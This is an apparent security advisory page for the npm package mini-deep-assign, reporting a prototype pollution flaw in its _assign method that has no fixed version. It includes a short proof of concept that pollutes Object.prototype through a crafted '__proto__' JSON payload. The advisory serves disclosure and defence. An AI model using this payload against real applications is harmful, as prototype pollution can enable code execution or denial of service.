Vulnerabilities

 1 via 1 paths

Dependencies

 2

Source

 GitHub

Commit

 ab891571

Find, fix and prevent vulnerabilities in your code.

Test and protect my applications
Severity
  • 1
Status
  • 1
  • 0
  • 0

high severity

Improper Control of Dynamically-Managed Code Resources

  • Vulnerable module: mini-deep-assign
  • Introduced through: mini-deep-assign@0.0.8

Detailed paths

  • Introduced through: require-dir-all@alykoshin/require-dir-all#ab891571b3737f4b83f2836fca0530d12e4ee1c3 mini-deep-assign@0.0.8

Overview

mini-deep-assign is a Like Object.assign(), but recursive

Affected versions of this package are vulnerable to Improper Control of Dynamically-Managed Code Resources through the _assign method. An attacker can execute arbitrary code or disrupt service by manipulating object properties.

PoC


(async () => {
  const lib = await import('mini-deep-assign');

var BAD_JSON = JSON.parse('{"__proto__":{"polluted":true}}');
var victim = {}
console.log("Before Attack: ", JSON.stringify(victim.__proto__));
try {
  lib.default ({}, BAD_JSON)
} catch (e) { }
console.log("After Attack: ", JSON.stringify(victim.__proto__));
delete Object.prototype.polluted;
})();

Remediation

There is no fixed version for mini-deep-assign.

References

Improper Control of Dynamically-Managed Code Resources vulnerability report